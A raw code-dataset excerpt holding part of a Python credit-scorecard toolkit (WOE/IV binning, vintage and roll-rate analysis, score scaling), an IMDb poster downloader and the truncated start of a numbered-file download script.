pd.concat([s.get() for s in multiple_results2],axis=1)\r\n\r\n #part1_df.to_csv(\"part1_df.csv\")\r\n #part2_df.to_csv(\"part2_df.csv\")\r\n '''\r\n cnt = 0 \r\n for s in multiple_results2:\r\n if cnt == 0:\r\n part2_df = s.get()\r\n cnt += 1\r\n continue\r\n part2_df = pd.concat([part2_df,s.get()],axis=1)\r\n '''\r\n #inputData.to_csv(\"inputData.csv\")\r\n #part2_df.to_csv(\"part2_df.csv\")\r\n #part1_df.to_csv(\"part1_df.csv\")\r\n #print(\"inputData:\"+str(len(inputData)))\r\n #print(\"part1_df:\"+str(len(part1_df)))\r\n #print(\"part2_df:\"+str(len(part2_df)))\r\n inputData = inputData.reset_index(drop=True)\r\n inputData = pd.concat([inputData,part1_df,part2_df],axis=1)\r\n dataset_bin_df = pd.concat([part1_df,part2_df],axis=1)\r\n\r\n return inputData,dataset_bin_df\r\n\r\n else:\r\n for col in nominal_intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n inputData[col+'_bin'] = inputData[col].apply(nominal_bin_convar,values=nominal_intervals[col])\r\n # deal with numerical variables\r\n for col in intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n inputData[col+'_bin'] = inputData[col].apply(bin_convar,values=intervals[col])\r\n \r\n filter_flag = inputData.columns.str.endswith('_bin')\r\n dataset_bin_df = inputData.loc[:,filter_flag].copy()\r\n \r\n return inputData,dataset_bin_df\r\n\r\ndef nominal_bin_convar(x,values):\r\n x_new = None\r\n for i in range(len(values)):\r\n if len(values[i]) == 0:\r\n continue\r\n if x in values[i]:\r\n x_new = str(values[i])\r\n \r\n return x_new\r\n\r\ndef bin_convar(x,values):\r\n #values = [float(item) for item in values]\r\n x_new = None\r\n for i in range(len(values)-1):\r\n if x <= values[i+1] and x >= values[i]:\r\n x_new = str(values[i]) + '-' + str(values[i+1])\r\n #print(x_new)\r\n \r\n return x_new\r\n\r\ndef woe_single_x(x, y,EPS,event=1):\r\n \"\"\"\r\n Calculate woe and information(IV) for a single feature\r\n -----------------------------------------------\r\n Param \r\n x: 1-D pandas dataframe stands for single feature\r\n y: pandas Series contains binary variable\r\n event: value of binary stands for the event to predict\r\n 
-----------------------------------------------\r\n Return\r\n Dictionary contains woe values for categories of this feature\r\n Information value of this feature\r\n \"\"\"\r\n \r\n check_target_binary(y)\r\n\r\n event_total, non_event_total = count_binary(y, event=event)\r\n x_labels = x.unique()\r\n #x_labels = np.unique(x)\r\n woe_dict = {}\r\n iv = 0\r\n #Test\r\n #print(x.name) \r\n for x1 in x_labels:\r\n y1 = y[x == x1] \r\n #y1 = y[np.where(x == x1)[0]]\r\n event_count = y1.sum()\r\n non_event_count = len(y1) - event_count\r\n #event_count, non_event_count = count_binary(y1, event=event)\r\n \r\n #Test\r\n # print(x1)\r\n #print(\"event total {},non event total {}\".format(event_total,non_event_total))\r\n #print(\"event count {},non event count {}\".format(event_count,non_event_count))\r\n rate_event = 1.0 * event_count / event_total#\r\n rate_non_event = 1.0 * non_event_count / non_event_total#\r\n if rate_event == 0:#\r\n rate_event = EPS\r\n elif rate_non_event == 0:#\r\n rate_non_event = EPS\r\n else:\r\n pass\r\n #Notes: multiply by 100 for comparison\r\n woe1 = math.log(rate_event / rate_non_event) \r\n #Test\r\n #print(woe1)\r\n woe_dict[x1] = woe1\r\n iv += (rate_event - rate_non_event) * woe1#\r\n \r\n return woe_dict, iv\r\n\r\ndef check_target_binary(y):\r\n \"\"\"\r\n check if the target variable is binary\r\n ------------------------------\r\n Param\r\n y:exog variable, pandas Series contains binary variable\r\n ------------------------------\r\n Return\r\n if y is not binary, raise an error \r\n \"\"\"\r\n y_type = type_of_target(y)\r\n if y_type not in ['binary']:\r\n raise ValueError('The target variable must be binary!')\r\n\r\ndef count_binary(a, event=1):\r\n \"\"\"\r\n calculate the cross table of a\r\n ------------------------------\r\n Params\r\n a: pandas Series contains binary variable\r\n event: treat event as 1, others as 0\r\n ------------------------------\r\n Return\r\n event_count: numbers of event=1\r\n non_event_count: numbers of event!=1\r\n \"\"\"\r\n event_count = (a == event).sum()\r\n non_event_count = a.shape[-1] - event_count\r\n \r\n return event_count, non_event_count\r\n \r\ndef _single_woe_trans(x, y,EPS):\r\n \"\"\"\r\n single var's woe trans\r\n ---------------------------------------\r\n Param\r\n x: single exog, pandas series\r\n y: endog, pandas series\r\n ---------------------------------------\r\n Return\r\n x_woe_trans: woe trans by x\r\n woe_map: map for woe trans\r\n info_value: info value of x\r\n \"\"\"\r\n #cal_woe = WOE()\r\n woe_map, info_value = woe_single_x(x, y,EPS)\r\n x_woe_trans = x.map(woe_map)\r\n x_woe_trans.name = x.name + \"_WOE\"\r\n \r\n return x_woe_trans, woe_map, info_value\r\n\r\ndef woe_iter(var,df,y,EPS):\r\n woe_maps = {}\r\n iv_values = {}\r\n df = df.copy()\r\n\r\n x = df[var]\r\n x_woe_trans, woe_map, info_value = _single_woe_trans(x, y,EPS)\r\n #df = pd.concat([df, x_woe_trans], axis=1)\r\n woe_maps[var] = woe_map\r\n iv_values[var] = info_value\r\n\r\n return x_woe_trans,woe_maps,iv_values\r\n\r\ndef woe_trans(varnames, y, df,EPS,multiprocess=False):\r\n \"\"\"\r\n WOE translation for multiple vars\r\n ---------------------------------------\r\n Param\r\n varnames: list\r\n y: pandas series, target variable\r\n df: pandas dataframe, endogenous vars\r\n ---------------------------------------\r\n Return\r\n df: pandas dataframe, trans results\r\n woe_maps: dict, key is varname, value is woe\r\n iv_values: dict, key is varname, value is info value\r\n \"\"\"\r\n woe_maps = {}\r\n iv_values = {}\r\n \r\n if multiprocess != 
False:\r\n \r\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\r\n multiple_results = [pool.apply_async(woe_iter,(var,df,y,EPS)) for var in varnames]\r\n\r\n woe_df = None\r\n woe_maps = {}\r\n iv_values = {}\r\n for res in multiple_results:\r\n ds,woe_map,iv_value = res.get()\r\n woe_maps.update(woe_map)\r\n iv_values.update(iv_value)\r\n woe_df = pd.concat([ds,woe_df],axis=1)\r\n\r\n df = pd.concat([df,woe_df],axis=1)\r\n\r\n return df,woe_maps,iv_values\r\n\r\n else:\r\n woe_df = None\r\n for var in varnames:\r\n x = df[var]\r\n x_woe_trans, woe_map, info_value = _single_woe_trans(x, y,EPS)\r\n woe_df = pd.concat([x_woe_trans,woe_df], axis=1)\r\n woe_maps[var] = woe_map\r\n iv_values[var] = info_value\r\n '''\r\n if woe_df is None:\r\n woe_df = x_woe_trans.copy()\r\n else:\r\n woe_df = pd.concat([woe_df,x_woe_trans],axis=1)\r\n '''\r\n df = pd.concat([df,woe_df],axis=1) \r\n\r\n return df,woe_maps,iv_values\r\n \r\ndef get_bin_report(inputData,var_lst,target_var,*args):\r\n \"\"\"\r\n get auto_bin result description\r\n ---------------------------------------\r\n Param\r\n inputData: pandas DataFrame\r\n var_lst: python list[variable_names]\r\n args: woe_map,iv_values,desc_df \r\n ---------------------------------------\r\n Return\r\n pandas dataframe\r\n \"\"\"\r\n if len(args) == 2:\r\n woe_map = args[0]\r\n iv_values = args[1]\r\n elif len(args) == 3:\r\n desc_df = args[2]\r\n \r\n count_bad_total = inputData[target_var].sum()\r\n count_good_total = len(inputData) - count_bad_total\r\n outData = pd.DataFrame(columns=\r\n ['variable','value','count_bad','count_good','bad_rate','WOE','IV'])\r\n for var in var_lst:\r\n df = inputData.groupby(var+'_bin')[target_var].sum().to_frame().copy()\r\n df = df.rename(columns={target_var:'count_bad'})\r\n df = df.reset_index()\r\n df = df.rename(columns={var+'_bin':'value'})\r\n df['variable'] = var+'_bin'\r\n #TODO BUG\r\n df['count_good'] = inputData.groupby(var+'_bin')[target_var].count().values - inputData.groupby(var+'_bin')[target_var].sum().values\r\n df['bad_rate'] = df.count_bad / (df.count_bad + df.count_good)\r\n \r\n if var + '_bin' in iv_values:\r\n df.loc[df.variable == var+'_bin','IV'] = iv_values.get(var + '_bin') \r\n \r\n var_woe = woe_map.get(var + '_bin')\r\n for val in df.loc[df.variable == var + '_bin','value'].unique():\r\n df.loc[(df.variable == var + '_bin') & \r\n (df.value == val),'WOE'] = var_woe.get(val)\r\n \r\n df = df.reindex(['variable','value'\r\n ,'count_bad','count_good'\r\n ,'bad_rate','WOE','IV'],axis='columns')\r\n \r\n outData = outData.append(df)\r\n \r\n outData['count_good_total'] = count_good_total\r\n outData['count_bad_total'] = count_bad_total\r\n outData['count_bin'] = outData['count_bad'] + outData['count_good']\r\n outData['count_bin_pct'] = outData['count_bin'] / len(inputData)\r\n #outData['count_bin_pct'] = outData['count_bin_pct'].apply(lambda x: np.round(x,2))\r\n #outData['bad_rate'] = (outData['bad_rate']).apply(lambda x: np.round(x,2))\r\n \r\n outData = outData.reindex(['variable','value'\r\n ,'count_bad','count_good'\r\n ,'count_bin','count_bin_pct'\r\n ,'bad_rate','count_good_total'\r\n ,'count_bad_total','WOE','IV'],axis='columns')\r\n \r\n #map_dict = {}\r\n if len(args) == 3:\r\n for var in outData.variable[~outData.variable.duplicated()]:\r\n var = var.replace('_bin','')\r\n cur_desc = desc_df.loc[desc_df.variable == var,'desc'].values[0]\r\n cur_source = desc_df.loc[desc_df.variable == var,'source'].values[0]\r\n outData.at[outData.variable == var+'_bin','description'] = 
cur_desc\r\n outData.at[outData.variable == var+'_bin','source'] = cur_source\r\n #map_dict[var] = [cur_desc,cur_source]\r\n \r\n outData = outData.reindex(['variable','value'\r\n ,'description','source'\r\n ,'count_bad','count_good'\r\n ,'count_bin','count_bin_pct'\r\n ,'bad_rate','count_good_total'\r\n ,'count_bad_total','WOE','IV'],axis='columns')\r\n \r\n return outData\r\n\r\ndef varclus_join_iv(fa_rst,iv_values):\r\n '''\r\n Merge the varclus result dataframe with IV values \r\n '''\r\n index = 0\r\n for col in fa_rst.Variables:\r\n col = col.replace('_WOE','')\r\n print(col)\r\n if col in iv_values.keys():\r\n print(col)\r\n fa_rst.ix[index,'IV'] = iv_values.get(col)\r\n index += 1\r\n \r\n return fa_rst\r\n\r\ndef out_data_report(data_report,intervals,nominal_intervals):\r\n '''\r\n Output the data_report includes\r\n data description,data source,bad counts,bad rate,woe and iv values \r\n --------------------------------------------------\r\n @Params: \r\n DataFrame: data_report\r\n Dictionary: split points of numerical attributes\r\n Dictionary: split points of nominal attributes\r\n '''\r\n data_report.to_excel(\"data_report.xlsx\")\r\n \r\n for k in intervals.keys():\r\n intervals[k] = [str(i) for i in intervals[k]]\r\n intervals[k] = ';'.join(intervals[k])\r\n \r\n for k in nominal_intervals.keys():\r\n count = 1\r\n for row in nominal_intervals[k]:\r\n if count == 1:\r\n rst = ','.join(row) + ';'\r\n count += 1\r\n continue\r\n rst += ','.join(row) \r\n rst += ';'\r\n nominal_intervals[k] = rst \r\n \r\n with open('intervals.csv','w') as f:\r\n w = csv.writer(f)\r\n w.writerow(['Attribute','Split Points'])\r\n w.writerows(intervals.items())\r\n \r\n with open('nominals.csv','w') as f:\r\n w = csv.writer(f)\r\n w.writerow(['Attribute','Split Points'])\r\n w.writerows(nominal_intervals.items())\r\n\r\ndef manual_intervals():\r\n '''\r\n Read in updated manual binning results \r\n and save as appropriate data structure for later usage\r\n @Return:\r\n Dictionary: intervals\r\n Dictionary: nominal intervals\r\n '''\r\n intervals_file = 'intervals.csv'\r\n nominal_file = 'nominals.csv'\r\n \r\n with open(intervals_file,'r') as f:\r\n reader = csv.DictReader(f)\r\n intervals = {}\r\n intervals = {row['Attribute'] : row['Split Points'] for row in reader}\r\n \r\n with open(nominal_file,'r') as f:\r\n reader = csv.DictReader(f)\r\n nominal_intervals = {}\r\n nominal_intervals = {row['Attribute'] : row['Split Points'] for row in reader}\r\n \r\n \r\n for col in intervals.keys():\r\n if col.strip() == \"\":\r\n continue\r\n intervals[col] = intervals[col].split(';')\r\n #print(intervals[col])\r\n \r\n \r\n intervals[col] = [float(i) for i in intervals[col] if i != '']\r\n \r\n for col in nominal_intervals.keys():\r\n nominal_intervals[col] = nominal_intervals[col].split(';')\r\n nominal_intervals[col] = [row.split(',') for row in nominal_intervals[col]]\r\n nominal_intervals[col] = [row for row in nominal_intervals[col] if len(row[0]) != 0]\r\n \r\n return intervals,nominal_intervals\r\n\r\ndef signal_func(x):\r\n if np.isnan(x):\r\n return np.nan\r\n elif float(x) > 10:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef plot_vintage(inputData,columns,period):\r\n #Calculate per loan month cumulative delq\r\n vintage_cum_df = inputData.cumsum(axis=1).copy()\r\n vintage_df = inputData.copy()\r\n #print(vintage_cum_df.values.shape,len(columns))\r\n vintage_cum_arr = np.round(vintage_cum_df.values / vintage_cum_df.iloc[:,-1].values.reshape((len(vintage_cum_df),-1))*100,2)\r\n vintage_arr = 
np.round(vintage_df.values / vintage_df.sum(axis=1).values.reshape(len(vintage_df),-1)*100,2)\r\n rst_cum_df = pd.DataFrame(vintage_cum_arr,columns=columns)\r\n rst_df = pd.DataFrame(vintage_arr,columns=columns)\r\n #Cumulative vintage\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n \r\n if isinstance(period,int):\r\n for i in range(period):\r\n rst_cum_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i+1) for i in range(period)])\r\n elif len(period) and isinstance(period,(list,tuple,set)) == 2:\r\n mth_lst = np.linspace(period[0],period[1],period[1]-period[0]+1) \r\n for i in mth_lst:\r\n rst_cum_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i) for i in mth_lst]) \r\n \r\n plt.xticks(range(len(columns)),columns,rotation=90)\r\n fig.savefig('vintage_cum.png')\r\n writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n sheet = writer.book.add_worksheet('vintage_sheet') \r\n sheet.insert_image(0,0,'vintage_cum.png')\r\n \r\n # Plot each Mob vintage\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n \r\n if isinstance(period,int):\r\n for i in range(period):\r\n rst_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i+1) for i in range(period)])\r\n elif len(period) and isinstance(period,(list,tuple,set)) == 2:\r\n mth_lst = np.linspace(period[0],period[1],period[1]-period[0]+1) \r\n for i in mth_lst:\r\n rst_df.iloc[i,:].plot(ax=ax)\r\n fig.legend([str(i) for i in mth_lst]) \r\n \r\n plt.xticks(range(len(columns)),columns,rotation=90)\r\n fig.savefig('vintage.png')\r\n #writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n #sheet = writer.book.add_worksheet('vintage_sheet') \r\n sheet.insert_image(0,10,'vintage.png')\r\n \r\n return rst_cum_df,rst_df,writer\r\n \r\ndef vintage(dataset,period,by='d'):\r\n \r\n if not isinstance(dataset,pd.DataFrame):\r\n raise TypeError(\"Input must be a Pandas DataFrame...\")\r\n #Chosse finished orders\r\n dataset = dataset.loc[dataset['status'] == 2,:].copy()\r\n #Get loan month\r\n dataset['out_loan_mth'] = dataset['loan_time'].str[5:7]\r\n dataset.drop(['app_no','loan_time','app_year'],axis=1,inplace=True)\r\n dataset['dlq_day_lst'] = dataset['dlq_day_lst'].str.replace(r'[\\[\\]]','')\r\n dataset['dlq_amount_lst'] = dataset['dlq_amount_lst'].str.replace(r'[\\[\\]]','')\r\n if by == 'd':\r\n contents = dataset['dlq_day_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Mob_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n columns = dataset.columns[dataset.columns.str.contains('Mob_')]\r\n for col in columns:\r\n dataset[col] = dataset[col].astype('float')\r\n dataset.loc[:,columns] = dataset.loc[:,columns].applymap(signal_func)\r\n dataset.drop(['dlq_day_lst'],axis=1,inplace=True)\r\n vintage_df = dataset.groupby('out_loan_mth')[columns].sum()\r\n rst_cum_df,rst_df,writer = plot_vintage(vintage_df,columns,period)\r\n\r\n elif by == 'amt':\r\n contents = dataset['dlq_amount_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Dlq_amount_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n dlq_cols = dataset.columns[dataset.columns.str.contains('Dlq_amount')]\r\n #print(dlq_cols)\r\n for col in dlq_cols:\r\n #TODO\r\n dataset[col] = dataset[col].astype('float')\r\n 
dataset.drop(['dlq_amount_lst'],axis=1,inplace=True)\r\n vintage_amt_df = dataset.groupby('out_loan_mth')[dlq_cols].sum()\r\n rst_cum_df,rst_df,writer = plot_vintage(vintage_amt_df,dlq_cols,period)\r\n else:\r\n raise Exception(\"Not valid parameter input...\")\r\n \r\n return rst_cum_df,rst_df,writer\r\n\r\ndef rollrate(dataset,mob_pnt,span,writer):\r\n \r\n rollRate_results = []\r\n if not isinstance(dataset,pd.DataFrame):\r\n raise TypeError(\"Input must be a Pandas DataFrame...\")\r\n #Choose finished orders\r\n dataset = dataset.loc[dataset.status == 2,:].copy()\r\n #Calculate total term of each contract\r\n dataset['term'] = dataset['dlq_day_lst'].str.count(',') + 1\r\n dataset['out_loan_mth'] = dataset['loan_time'].str[5:7]\r\n unique_mths = dataset['out_loan_mth'].unique()\r\n for mth in unique_mths.tolist():\r\n rst = roll_rate_cal(dataset.loc[dataset['out_loan_mth'] == mth,:].copy(),mob_pnt,span)\r\n rollRate_results.append(rst)\r\n \r\n rst_all = roll_rate_cal(dataset.copy(),mob_pnt,span)\r\n \r\n fig = plt.figure(figsize=(20,6))\r\n ax = fig.add_subplot(1,1,1)\r\n rst_all.plot.barh(stacked=True,ax=ax)\r\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\r\n ncol=2, mode=\"expand\", borderaxespad=0.)\r\n \r\n fig.savefig('rollrate.png')\r\n #writer = pd.ExcelWriter('vr_analysis.xlsx',engine='xlsxwriter')\r\n sheet = writer.book.add_worksheet('rollrate_sheet')\r\n sheet.insert_image(0,0,'rollrate.png') \r\n writer.save()\r\n \r\n return rollRate_results,rst_all\r\n\r\ndef roll_rate_cal(dataset,mob_pnt,span):\r\n \r\n \r\n dataset['dlq_day_lst'] = dataset['dlq_day_lst'].str.replace(r'[\\[\\]]','')\r\n #After loan behaviour list\r\n contents = dataset['dlq_day_lst'].str.split(',',expand=True)\r\n col_names = {}\r\n for col in contents.columns:\r\n if col not in col_names:\r\n col_names[col] = 'Mob_{}'.format(str(col+1))\r\n contents.rename(columns=col_names,inplace=True)\r\n dataset = dataset.join(contents).copy()\r\n col_names = dataset.columns[dataset.columns.str.contains('Mob_')]\r\n #Transfer Mob data types to float\r\n for col in col_names:\r\n dataset[col] = dataset[col].astype('float')\r\n dataset.drop(['status','app_year','loan_time'],axis=1,inplace=True)\r\n left = mob_pnt - span\r\n right = mob_pnt + span\r\n #Check if the specified mob and span are appropriate\r\n dataset['is_inrange'] = (left > 0) & (right <= dataset['term'])\r\n if ~dataset['is_inrange'].all():\r\n raise Exception(\"Column specified out of Mob span...\")\r\n else:\r\n s_bf = dataset.loc[:,'Mob_1':'Mob_{0}'.format(mob_pnt)].sum(axis=1)\r\n s_af = dataset.loc[:,'Mob_{0}'.format(mob_pnt+1):'Mob_{0}'.format(right)].sum(axis=1)\r\n dataset['count_dlq_pnt_bf'.format(mob_pnt)] = s_bf\r\n dataset['count_dlq_pnt_af'.format(mob_pnt)] = s_af\r\n \r\n norm_af_flag = (dataset['count_dlq_pnt_af'] >= 0) & (dataset['count_dlq_pnt_af'] <= 10)\r\n one_af_flag = (dataset['count_dlq_pnt_af'] > 10) & (dataset['count_dlq_pnt_af'] <= 20)\r\n two_af_flag = (dataset['count_dlq_pnt_af'] > 20) & (dataset['count_dlq_pnt_af'] <= 30)\r\n three_af_flag = dataset['count_dlq_pnt_af'] > 30\r\n\r\n dataset.loc[norm_af_flag,'flag_af'] = 'normal'\r\n dataset.loc[one_af_flag,'flag_af'] = 'dlq_1'\r\n dataset.loc[two_af_flag,'flag_af'] = 'dlq_2'\r\n dataset.loc[three_af_flag,'flag_af'] = 'dlq_3'\r\n\r\n norm_bf_flag = (dataset['count_dlq_pnt_bf'] >= 0) & (dataset['count_dlq_pnt_bf'] <= 10)\r\n one_bf_flag = (dataset['count_dlq_pnt_bf'] > 10) & (dataset['count_dlq_pnt_bf'] <= 20)\r\n two_bf_flag = (dataset['count_dlq_pnt_bf'] > 20) & 
(dataset['count_dlq_pnt_bf'] <= 30)\r\n three_bf_flag = dataset['count_dlq_pnt_bf'] > 30\r\n \r\n dataset.loc[norm_bf_flag,'flag_bf'] = 'normal'\r\n dataset.loc[one_bf_flag,'flag_bf'] = 'dlq_1'\r\n dataset.loc[two_bf_flag,'flag_bf'] = 'dlq_2'\r\n dataset.loc[three_bf_flag,'flag_bf'] = 'dlq_3'\r\n\r\n dataset = dataset.loc[:,['app_no','flag_bf','flag_af']]\r\n results = pd.pivot_table(dataset,index='flag_bf',columns='flag_af',aggfunc='count')\r\n #results.columns = ['dlq_1','dlq_2','dlq_3','normal']\r\n\r\n statistic = results.sum(axis=1).values.reshape((len(results),-1))\r\n rst = results.values / statistic *100\r\n results = pd.DataFrame(np.round(rst,2),index=results.index.tolist(),\r\n columns=results.columns.tolist())\r\n \r\n return results\r\n\r\ndef calculate_score(dataset,y_variable,appcode=None):\r\n #cols_woe = dataset.columns[dataset.columns.str.endswith('_WOE')].values.tolist()\r\n Y = dataset[y_variable]\r\n dataset.columns\r\n if appcode is None:\r\n X = dataset.drop([y_variable],axis=1)\r\n else:\r\n X = dataset.drop([y_variable,appcode],axis=1)\r\n X1 = sm.add_constant(X)\r\n logit = sm.Logit(Y,X1)\r\n result = logit.fit()\r\n \r\n coe = result.params\r\n PDO = 40\r\n P0 = 600\r\n theta0 = 0.08\r\n B = PDO / math.log(2)\r\n A = P0 + B * math.log(theta0)\r\n #'''\r\n dataset['score'] = A - B * coe['const']\r\n x_variables = dataset.columns[dataset.columns.str.endswith('_WOE')].values.tolist()\r\n for i in x_variables:\r\n #print(i)\r\n #print(coe[i])\r\n dataset['score'] = dataset['score'] - B * coe[i] * dataset[i]\r\n #'''\r\n return \r\n\r\nif __name__ == '__main__':\r\n \r\n # Demo using PBOC credit bureau data:\r\n \r\n # Step 1: prepare the modeling dataset\r\n model_data = pd.read_pickle(\"model_data.pkl\")\r\n model_data['ln_cc_mob_max'] = model_data[['ln_mob', 'cc_mob']].max(axis = 1)\r\n model_data_thick = model_data[model_data['ln_cc_mob_max'].notnull()].copy()\r\n # Select the X variables\r\n chosen_vars = ['cl_query_self','ln_query_corp_cnt_lst_12m'\r\n ,'cc_uclose_um_mob','cl_query_cnt_lst_12m'\r\n ,'cc_limit3_act','hz_cnt_ln'\r\n ,'hz_houseloancount','dm_maritalstate']\r\n # Join on the target variable Y\r\n dataset = model_data_thick.loc[:,chosen_vars].join(model_data_thick.loc[:,['fspd30_recalled']])\r\n # Drop categorical variables with more than 100 unique values and numerical variables with only one unique value\r\n cols2drop = variableFilter(dataset,100)\r\n dataset.drop(cols2drop,axis=1,inplace=True)\r\n # Save the list of categorical variables\r\n nominal_vars = getNominalVars(dataset)\r\n # Handle missing values\r\n dataset.loc[:,nominal_vars] = dataset.loc[:,nominal_vars].fillna('NaN')\r\n numerical_vars = [col for col in dataset.columns if col not in nominal_vars]\r\n numerical_vars.remove('fspd30_recalled')\r\n dataset.loc[:,numerical_vars] = dataset.loc[:,numerical_vars].fillna(-9999)\r\n # Save the list of X variable names\r\n x_vars = nominal_vars + numerical_vars \r\n inputData = dataset.copy()\r\n \r\n # Step 2: run automatic binning with the toolkit\r\n intervals,nominal_intervals,inputData = discrete(inputData,nominal_vars,6,True)\r\n\r\n # Step 3: map the binning results back onto the source dataset, generating the corresponding bin features\r\n ds,dataset_bin_df = dataTransfer(inputData.copy(),intervals,nominal_intervals,True)\r\n\r\n # Step 4: compute WOE values for each bin\r\n bin_vars = [col+'_bin' for col in x_vars]\r\n df,woe_maps,iv_values = woe_trans(bin_vars,ds['fspd30_recalled'],ds,EPS=1e-8,multiprocess=True)\r\n \r\n # Step 5: run Varclus\r\n cols_woe = df.columns[df.columns.str.endswith('bin_WOE')].values.tolist()\r\n df_t = df.loc[:,cols_woe]\r\n fa_obj = varclus_analysis.FeatureSelection.load_data(df_t)\r\n fa_obj.varclus()\r\n fa_rst = fa_obj.show()\r\n fa_rst = varclus_join_iv(fa_rst,iv_values)\r\n print(fa_rst)\r\n\r\n # Finally: KS calculation\r\n woe_vars = [col+'_bin_WOE' for col in x_vars]\r\n model_data_woe 
= df.loc[:,woe_vars+['fspd30_recalled']].copy()\r\n # Build the training and validation sets\r\n X_train,X_test,y_train,y_test = train_test_split(model_data_woe.drop('fspd30_recalled',axis=1),\r\n model_data_woe['fspd30_recalled'],test_size=0.33,random_state=42)\r\n sample_dev = X_train.join(y_train)\r\n sample_vld = X_test.join(y_test)\r\n helper.logit_fit(sample_dev,'fspd30_recalled',woe_vars, title = 'Fitting Dev Sample', plot_text = 'Fitting Dev Sample')\r\n helper.logit_fit(sample_vld, 'fspd30_recalled', woe_vars, title = 'Refitting Validation', plot_text = 'Refitting Validation')\r\n \r\n ","sub_path":"scorecard_kit.py","file_name":"scorecard_kit.py","file_ext":"py","file_size_in_byte":43493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
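A tiny worked example of the WOE/IV arithmetic that woe_single_x in scorecard_kit.py implements, on made-up counts (10 events and 90 non-events, split across two bins):

import math

event_total, non_event_total = 10, 90
bins = {'low': (2, 60), 'high': (8, 30)}  # bin -> (event_count, non_event_count)

iv = 0.0
for name, (ev, non_ev) in bins.items():
    rate_event = ev / event_total              # 0.2 for 'low', 0.8 for 'high'
    rate_non_event = non_ev / non_event_total  # 0.6667 for 'low', 0.3333 for 'high'
    woe = math.log(rate_event / rate_non_event)
    iv += (rate_event - rate_non_event) * woe
    print(name, round(woe, 4))  # low -> -1.204, high -> 0.8755
print('IV =', round(iv, 4))     # 0.9704, i.e. a strongly predictive feature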
+{"seq_id":"130976352","text":"#!/usr/bin/env python\n\"\"\"\nImdb Watcher\nMike Tung\n\"\"\"\n\nfrom imdbpie import Imdb\nimport os\nimport urllib.request\nimport urllib\n\nclass Watcher:\n def __init__(self):\n self.imdb = Imdb(anonymize=True)\n self.tracked_shows = self.get_shows()\n self.static_dir = os.path.join(os.path.dirname(__file__), '../static/images')\n\n def get_shows(self):\n \"\"\"\n gets all current popular shows from imdb\n \"\"\"\n shows = self.imdb.popular_shows()\n tracked_shows = []\n for show in shows:\n tracked_shows_d = {}\n tracked_shows_d['id'] = show['tconst']\n tracked_shows_d['title'] = show['title']\n tracked_shows_d['poster'] = show['image']['url']\n tracked_shows.append(tracked_shows_d)\n return tracked_shows\n\n def get_show_id(self, show_title):\n \"\"\"\n Gets show title id\n\n args:\n\n show_title: name of show to be queried\n\n returns:\n\n show_id: id of show\n \"\"\"\n\n for show in self.tracked_shows:\n if show_title == show['title']:\n return show['id']\n\n def get_episodes(self, show_id):\n \"\"\"\n Gets all episodes of a given show\n\n args:\n\n show_id: tconst id from imdb\n\n returns:\n\n ist of episodes\n \"\"\"\n return self.imdb.get_episodes(show_id)\n\n def get_all_episodes(self):\n \"\"\"\n Gets all episodes\n\n args:\n\n None\n\n returns:\n\n list of episodes for all shows\"\"\"\n\n programs = {}\n for show in self.tracked_shows:\n programs[show['title']] = self.get_episodes(show['id'])\n\n return programs\n\n def get_poster(self, show_title):\n \"\"\"\n gets the img url for the poster of a show\n\n args:\n\n show_title: title of show\n\n returns:\n\n dictionary with {show_title: poster_url}\n \"\"\"\n\n #print(self.tracked_shows[show_id]['poster'])\n for show in self.tracked_shows:\n if show['title'] == show_title:\n return {show_title : show['poster']}\n\n def save_posters(self, urls, title):\n title = self.sanitize_title(title)\n dest = '{}/{}.jpg'.format(self.static_dir, title)\n urllib.request.urlretrieve(url, dest)\n\n def sanitize_title(self, title):\n forbidden = ('<', '>', ':', '\"', '/', '\\\\', '|', '?', '*')\n for char in forbidden:\n title = title.replace(char, '')\n return title\n\n def get_show_titles(self):\n \"\"\"\n Gets show titles\n\n args:\n\n None\n\n returns:\n\n list of show titles\n \"\"\"\n\n return [show['title'] for show in self.tracked_shows]\n\nif __name__ == '__main__':\n a = Watcher()\n titles = a.get_show_titles()\n for t in titles:\n posters_dict = a.get_poster(t)\n for title, url in posters_dict.items():\n a.save_posters(url, title)\n","sub_path":"watchdog/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"178082448","text":"# Written by Joshua Cullen ~ 2015\n# Designed to work on debian-based linux distributions\nimport os\nimport time\n\n# GLOBBAL VARIABLES\n\n# ALL FUNCTIONS LISTED HERE\ndef clear():\n\tos.system(\"clear\") # Clears the screen\n\ndef newline(n):\n\tfor x in range(n):\n\t\tprint(\"\") # New line\n\ndef getUrl():\n\tclear() # Getting url\n\tprint(\"Please enter the full url and path to the first file below.\")\n\tprint(\"e.g. www.example.com/1.jpg :\")\n\tnewline(1)\n\turl = input(\">>> \")\n\treturn url\n\ndef getFileNumber():\n\tclear()\n\twhile True: # Getting number of files\n\t\tprint(\"Please enter the number of files to download.\")\n\t\tprint(\"e.g. www.example.com/1.jpg :\")\n\t\tnewline(1)\n\t\ttry:\n\t\t\tnumberOfFiles = int(input(\">>> \"))\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tclear()\n\t\t\tprint(\"This needs to be an integer!\")\n\t\t\tnewline(1)\n\treturn numberOfFiles\n\ndef 